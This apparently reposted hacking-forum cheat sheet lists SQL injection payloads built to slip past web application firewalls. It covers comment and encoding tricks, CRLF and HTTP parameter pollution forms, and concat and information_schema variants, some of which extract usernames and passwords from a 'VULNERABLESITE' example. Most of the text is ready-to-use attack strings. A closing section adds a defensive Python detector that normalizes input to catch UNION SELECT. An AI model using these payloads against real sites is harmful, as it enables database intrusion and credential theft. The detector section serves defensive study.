- WAF (Web Firewall) SQLi Bypass Techniques / ++REP Please hit the Like button :cigara:
- KingSkrupellos - https://www.cyberizm.org/cyberizm-waf-web-guvenlik-duvari-sqli-bypass-teknikleri.html
- ---------------------------------------WAF BYPASS---------------------------------
- 1. Union Select :-
- (a):- /*!50000union*/ select Note:- 00000/12345 can also be used, as can /*!' '*/
- (b):- /*!50000union*/ /*!50000select*/
- (c):- %0AUNION%23 [can also be used for select] ------ this is URL-encoded
- (d):- +--%0Aunion+--%0Aselect+
- (e):- +--%0Aunion+--%0Aselect+--%0A1,--%0A2,--%0A3,--%0A4,--%0A5 [the URL-encoded technique can be used between the numbers too]
- (f):- /%2A%2A/union/%2A%2A/select/%2A%2A/ [Encode to Hex Forbidden Technique: Functions Use:- 1. /%2A%2A/ 2. %2F**%2F ]
- (g):- +UnIoN+SeLselectECT+
- (h):- Use any characters like :- |, ?, ", ', *, %, � , [], ;, :, \/, $, �, ()... ex:- +uni*on+sel*ect+
- (i):- +UnIoN+SeLeCt+
- (j):- HTTP Parameter Pollution :- /* &id= */union/* &id= */select/* &id= */
- List of all HTTP Technique:- /* &c= */
- /* &b= */
- /* &id= */
- /*&q=*/
- /*&prodID=*/
- /*&abc=*/
- q=select
- union /* and b=*/ select
- q=select/*&q=*/
- q=*/from/*
- q=select/*&q=*/name&q=password/*&q=*/
- &b= */select+1,2 /?a=1+ union/* &b= */
- q=*/name q=password/*
- ?id=1 /**/union/* &id= */select/* &id= */pwd/* &id= */from/* &id= */users
- ________________________________________________________________
- (k):- CRLF BYPASS TECHNIQUES:-
- +%0A%0D/*!%0A%0Dunion*/+%0A%0D/*!50000Select*/%0A%0D/*!
- (l):- When a fatal error occurs :-
- When this error occurs, try null like this :- union select null,2,3,4,5-- produces an error
- union select 1,null,2,3,4,5-- produces an error
- union select 1,2,null,4,5-- produces no error
- _________________________________________________________________________
- Try this technique until you no longer get an error
- (m):- {
- +--+Union+--+Select+--+
- +#uNiOn+#sEleCt+
- +union+distinct+select+
- +union+distinctROW+select+
- uni<on all sel<ect
- +union%23aa%0Aselect+
- 0%a0union%a0select%09
- %0Aunion%0Aselect%0A
- +UnIoN+SeLselectECT+
- /%2A%2A/union/%2A%2A/select/%2A%2A/
- %2f%2a*/UNION%2f%2a*/SELECT%2f%2a*/
- +%2F**%2Funion%2F**%2Fselect+
- +UnIoN/*&a=*/SeLeCT/*&a=*/
- +%0A%0D/*!%0A%0Dunion*/+%0A%0D/*!50000Select*/%0A%0D
- /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
- %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
- union(select(0),version(),(0),(0),(0),(0),( 0),(0),(0))
- /*!50000union*/+/*!50000select*/
- UNIunionON+SELselectECT
- union+/*!select*/+1,2,3
- union/**/select/**/1,2,3
- uni%20union%20/*!select*/%20
- /**//*!union*//**//*!select*//**/
- union%23aa%0Aselect
- /**/union/*!50000select*/
- +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
- id=1+�UnI�On�+'SeL�ECT� <-MySQL only
- id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
- }
- _____________________________________________________________
- (n):- Concat Bypassing:-
- {
- group_concat()
- grOUp_ConCat(/*!*/,0x3e,/*!*/)
- group_concat(,0x3c62723e)
- g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29
- CoNcAt()
- concat%00()
- %00CoNcAt()
- CONCAT(DISTINCT )
- concat(0x3a,,0x3c62723e)
- /*!50000cOnCat*/
- concat_ws()
- concat_ws(0x3a,)
- CONCAT_WS(CHAR(32,58,32),version(),)
- REVERSE(tacnoc)
- binary(version())
- uncompress(compress(version()))
- aes_decrypt(aes_encrypt(version(),1),1)
- }
- ________________________________________________________________
- (o):- Information schema Bypass :-
- 1.information_schema . tables
- 2.`information_schema`.`tables`
- 3./*!information_schema.tables*/
- 4.FROM+information_schema%20%0C%20.%20%09tables
- 5.(select+group_concat(table_name)`foo`+From+`information_schema`.`tAblES`+Where+table_ScHEmA=schEMA())
- 6. Alternative names:- {
- information_schema.statistics
- information_schema.key_column_usage
- information_schema.table_constraints
- information_schema.partitions
- }
- 7. /*!50000column_name*/%0A%46roM%0AInfORmaTion_scHema . cOlumnS%0A%57heRe%0A/*!50000tAblE_naMe*/=hex table
- 8. (/*!50000%53elect*/%0A/*!50000%54able_name*/%0A%0A/*!50000%46roM*/%0A/*!50000%49nfORmaTion_%53cHema . %54AblES*/%0A/*!50000%57here*/%0A%54able_ScHEmA=schEMA()%0Alimit%0A0,1)
- 9. String-based SQLi:- put ' and at the end use one of these :- -- - -+-- +--+/ --+- #
- for example: VULNERABLESITE/id=2' --+
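
Every form listed above relies on the WAF matching the raw request text while the database parses something else. The following is an added example, not part of the original paste: a detection-side sketch that brings a parameter into canonical form (repeated URL-decoding, MySQL comment handling, whitespace folding, merging of repeated parameters) before looking for UNION ... SELECT. The function names, the three-round decode limit and the comma join for repeated parameters are assumptions chosen for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

MAX_DECODE_ROUNDS = 3  # assumption: enough to undo double encoding (%252f)
UNION_SELECT = re.compile(
    r"\bunion\b(?:\s+(?:all|distinct|distinctrow))?\s*\(?\s*select\b")


def decode_repeatedly(value):
    """URL-decode until stable so %252f and %2f both end up as '/'."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote_plus(value, encoding="latin-1")
        if decoded == value:
            break
        value = decoded
    return value


def canonicalize(value):
    """Approximate the token stream MySQL sees after decoding and comments."""
    text = decode_repeatedly(value).replace("\x00", "")
    # MySQL executes the body of /*! ... */ and /*!50000 ... */, so keep it.
    text = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", text, flags=re.S)
    # Ordinary block comments act as whitespace between tokens.
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    # '#' and '--<whitespace>' comments stop at the newline; the rest is SQL.
    text = re.sub(r"(?:#|--(?=\s))[^\r\n]*", " ", text)
    return re.sub(r"[\s\xa0]+", " ", text).lower().strip()


def merge_repeated_parameters(query_string):
    """Join repeated parameters with ',' (assumed backend behaviour)."""
    merged = {}
    pairs = parse_qsl(query_string, keep_blank_values=True, encoding="latin-1")
    for name, value in pairs:
        merged.setdefault(name, []).append(value)
    return {name: ",".join(values) for name, values in merged.items()}


def is_union_select(value):
    """True when the canonical form contains a UNION ... SELECT sequence."""
    return bool(UNION_SELECT.search(canonicalize(value)))


if __name__ == "__main__":
    # Inputs copied from the paste above, plus one constructed benign value.
    for sample in ("/*!50000union*/ /*!50000select*/", "union%23aa%0Aselect",
                   "0%a0union%a0select%09", "credit union members"):
        print(is_union_select(sample), repr(canonicalize(sample)))
```

Matching on the canonical form and rejecting the request, rather than deleting keywords from it, is what makes nested-keyword forms such as (g) ineffective. Parameterized queries in the application remain the actual fix; this check only narrows what reaches it.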